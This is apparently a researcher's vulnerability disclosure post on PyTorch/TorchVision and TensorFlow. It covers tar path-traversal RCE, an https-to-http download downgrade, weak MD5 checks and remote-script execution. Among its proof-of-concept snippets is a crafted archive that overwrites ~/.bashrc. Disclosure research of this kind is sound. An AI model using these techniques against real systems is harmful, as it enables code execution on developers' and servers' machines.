This month I declared the Month of AI Framework Bugs, and here are the 0days that came out of it. I analyzed the two most common AI frameworks, PyTorch (with TorchVision) and TensorFlow, which are mostly Python with C++ at the lower levels (for serving trained models or offloading the actual training to GPUs via CUDA libraries). Both frameworks were/are actively developed and backed by Big Tech, which results in certain company repositories being hardcoded as trusted in the Python code, among other artefacts.
For classical security - i.e. keeping your infra safe from intruders - you can basically divide the attack surface into two parts.
1. Server-side: get RCE on the deployed servers, or somehow get a shell via the prompt or the REST/gRPC interfaces.
2. Client-side: get RCE on developer machines, or on the deployed server instance, but by means other than the REST/gRPC interface.
I skipped the Pickle/deserialization surface this time, as it is a known breaking point that is already being addressed (although not with great results). All results of my research can be found in my tensor-pwn repo.
The actual results:
* A file overwrite in Python's core tar extraction module can lead to RCE by overwriting either ~/.bashrc or Python code in the .local cache (a sketch follows right after this list).
* When datasets are obtained for training and/or deployment on the server, the fetched tar archives are extracted and the previous issue manifests. This is bad enough for https:// URLs already, as it is known that relying on the CA bundle alone is not sufficient to prevent RCE attacks. But ...
* ... some frameworks replace https:// URLs with http:// on failure, so that the archives are eventually fetched in plain text and can be replaced on the network path even by attackers who are not capable of intercepting HTTPS sessions (this is far easier than it sounds). This leads to unauthenticated RCE when deploying torchvision-based models. Note that the training-data fetch and extraction (read: overwrite/RCE) often happens automatically when the model's class is instantiated, with no manual download necessary; this therefore resembles a 0-click RCE (see the downgrade sketch below). Some training-data downloaders contain an MD5 checksum "protection", but this is not the case for the Kinetics model shown in the screenshot below. MD5 is considered broken anyway, so downloaders that rely on it are ultimately subject to the aforementioned RCE conditions too.
* RCE and LPE opportunities arise from scripts being downloaded and executed while developers work with the `cuda.memory` module (a generic sketch of this download-and-execute pattern closes the examples below).
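
To make the tar extraction issue concrete, here is a minimal sketch of the classic path traversal. The archive, the `dataset/` target directory and the member name are made up for illustration; a real payload would use enough `../` components to reach e.g. the victim's ~/.bashrc:

```python
import io
import os
import tarfile

# Craft an archive whose member name escapes the extraction
# directory via "../" (illustrative payload and path).
payload = b'echo pwned\n'
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w:gz") as tar:
    info = tarfile.TarInfo(name="../.bashrc")
    info.size = len(payload)
    tar.addfile(info, io.BytesIO(payload))
buf.seek(0)

# A vulnerable consumer: extractall() without a sanitizing filter
# (on Python versions where extraction is unfiltered by default)
# writes the member *outside* of "dataset/".
os.makedirs("dataset", exist_ok=True)
with tarfile.open(fileobj=buf, mode="r:gz") as tar:
    tar.extractall(path="dataset")  # ./.bashrc appears next to dataset/
```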
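The https-to-http downgrade boils down to the following pattern. This is a simplified, hypothetical sketch of the fallback logic, not the literal framework code:

```python
import urllib.request

def fetch_archive(url: str, dest: str) -> None:
    """Hypothetical sketch of the vulnerable download fallback."""
    try:
        urllib.request.urlretrieve(url, dest)
    except OSError:
        # On any TLS/connection hiccup, retry over plain-text HTTP.
        # A man-in-the-middle on the network path can now serve a
        # malicious tar archive without ever touching a TLS session.
        if url.startswith("https://"):
            urllib.request.urlretrieve("http://" + url[len("https://"):], dest)
            return
        raise
```

The 0-click aspect comes from the fetch-and-extract running inside the constructor: a single instantiation along the lines of `torchvision.datasets.Kinetics(..., download=True)` is enough to trigger the download and the tar extraction, with no further user interaction.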
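The `cuda.memory` finding follows the same download-and-execute anti-pattern. The sketch below is a generic, hypothetical illustration of that pattern (URL and helper name are made up), not the actual PyTorch code:

```python
import urllib.request

def load_viz_helper() -> None:
    # Hypothetical illustration: fetching a script at runtime and
    # executing it means whoever controls the URL - or the network
    # path, if the fetch degrades to http:// - controls execution.
    script = urllib.request.urlopen("https://example.com/memory_viz_helper.py").read()
    exec(compile(script, "<remote>", "exec"))  # runs with the developer's privileges -> RCE/LPE
```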
So, whatever your preference, pick the bug you like most and give it the best chances of owning AI deployments in your pen-tests.
Enjoy the repo!